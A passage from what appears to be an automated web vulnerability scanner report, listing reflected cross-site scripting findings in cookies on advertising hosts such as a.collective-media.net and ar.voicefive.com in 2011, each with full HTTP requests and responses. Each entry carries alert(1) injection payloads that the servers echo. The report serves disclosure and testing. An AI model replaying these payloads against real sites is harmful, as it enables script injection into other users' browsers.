Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 567d1'%3balert(1)//8127cba5a34 was submitted in the cli cookie. This input was echoed as 567d1';alert(1)//8127cba5a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3567d1'%3balert(1)//8127cba5a34; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:27 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:27 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:27 GMT
Content-Length: 7745

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
vascript">CollectiveMedia.createAndAttachAd("iblocal-22806307_1296266067","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22806307_1296266067,11d765b6a10b1b3567d1';alert(1)//8127cba5a34,Miscellaneous,;;sz=300x250;net=iblocal;env=ifr;ord1=80394;contx=Miscellaneous;dc=w;btg=;ord=0.9691057777963579?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.1023. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 219ad"%3balert(1)//eb02bd66d47 was submitted in the cli cookie. This input was echoed as 219ad";alert(1)//eb02bd66d47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3219ad"%3balert(1)//eb02bd66d47; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Content-Length: 7745

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11d765b6a10b1b3219ad";alert(1)//eb02bd66d47&seg_code=noseg&ord=1296266066",true);CollectiveMedia.addPixel("http://tags.bluekai.com/site/2731",false);CollectiveMedia.addPixel("http://pixel.quantserve.com/seg/r;a=p-86ZJnSph3DaTI;rand=164628109;re
...[SNIP]...

4.1024. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca275'%3balert(1)//bab4de1adb9 was submitted in the cli cookie. This input was echoed as ca275';alert(1)//bab4de1adb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3ca275'%3balert(1)//bab4de1adb9; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:39 GMT
Connection: close
Content-Length: 7241

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-12740564_1296266079","http://ad.doubleclick.net/adj/q1.bosherald/be_ent;net=q1;u=,q1-12740564_1296266079,11d765b6a10b1b3ca275';alert(1)//bab4de1adb9,ent,;;sz=300x250;net=q1;env=ifr;ord1=204282;contx=ent;dc=w;btg=;ord=2134060438??","300","250",false);</scr'+'ipt>
...[SNIP]...

4.1025. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e74d'%3balert(1)//8718b1bc98e was submitted in the cli cookie. This input was echoed as 1e74d';alert(1)//8718b1bc98e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b31e74d'%3balert(1)//8718b1bc98e; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7244

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-79405113_1296266073","http://ad.doubleclick.net/adj/q1.bosherald/be_ent_fr;net=q1;u=,q1-79405113_1296266073,11d765b6a10b1b31e74d';alert(1)//8718b1bc98e,ent,;;sz=300x250;net=q1;env=ifr;ord1=359683;contx=ent;dc=w;btg=;ord=1194202561??","300","250",false);</scr'+'ipt>
...[SNIP]...

4.1026. http://a.collective-media.net/cmadj/q1.bosherald/ent [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f52a'%3balert(1)//5cd194822d7 was submitted in the cli cookie. This input was echoed as 1f52a';alert(1)//5cd194822d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b31f52a'%3balert(1)//5cd194822d7; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Content-Length: 7237

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-27651854_1296266075","http://ad.doubleclick.net/adj/q1.bosherald/ent;net=q1;u=,q1-27651854_1296266075,11d765b6a10b1b31f52a';alert(1)//5cd194822d7,ent,;;sz=300x250;net=q1;env=ifr;ord1=173312;contx=ent;dc=w;btg=;ord=395221226??","300","250",false);</scr'+'ipt>
...[SNIP]...

4.1027. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent_fr

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aed7'%3balert(1)//fa2fa400f77 was submitted in the cli cookie. This input was echoed as 8aed7';alert(1)//fa2fa400f77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=269011797?;env=ifr;ord1=820052;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b38aed7'%3balert(1)//fa2fa400f77; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7240

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-23360047_1296266073","http://ad.doubleclick.net/adj/q1.bosherald/ent_fr;net=q1;u=,q1-23360047_1296266073,11d765b6a10b1b38aed7';alert(1)//fa2fa400f77,ent,;;sz=300x250;net=q1;env=ifr;ord1=820052;contx=ent;dc=w;btg=;ord=269011797??","300","250",false);</scr'+'ipt>
...[SNIP]...

4.1028. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [cli cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5bd7'%3balert(1)//464e19fd8c7 was submitted in the cli cookie. This input was echoed as e5bd7';alert(1)//464e19fd8c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;net=uol;ord=1655200;env=ifr;ord1=605483;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3e5bd7'%3balert(1)//464e19fd8c7; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:39 GMT
Connection: close
Content-Length: 7274

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
="Javascript">CollectiveMedia.createAndAttachAd("uol-44220574_1296266079","http://ad.doubleclick.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;net=uol;u=,uol-44220574_1296266079,11d765b6a10b1b3e5bd7';alert(1)//464e19fd8c7,ent,;;dcove=o;sz=300x250;net=uol;env=ifr;ord1=605483;contx=ent;dc=w;btg=;ord=1655200?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.1029. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 94aba<script>alert(1)</script>18a5cd25845 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=194aba<script>alert(1)</script>18a5cd25845; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '194aba<script>alert(1)</script>18a5cd25845', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|h
...[SNIP]...

4.1030. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 98d98<script>alert(1)</script>11107b5acab was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401740 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p85001580=exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C98d98<script>alert(1)</script>11107b5acab

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2011 16:37:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=7&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 16:37:23 2011&prad=58087481&arc=40401740&; expires=Thu 28-Apr-2011 16:37:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26393

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087481",Pid:"p85001580",Arc:"40401740",Location:CO
...[SNIP]...
1580": 'exp=6&initExp=Wed Jan 26 20:14:29 2011&recExp=Fri Jan 28 14:14:48 2011&prad=58087481&arc=40401349&', "BMX_3PC": '1', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1296224089%2E327%2Cwait%2D%3E10000%2C98d98<script>alert(1)</script>11107b5acab' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

4.1031. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload ef153<script>alert(1)</script>1aed363857 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
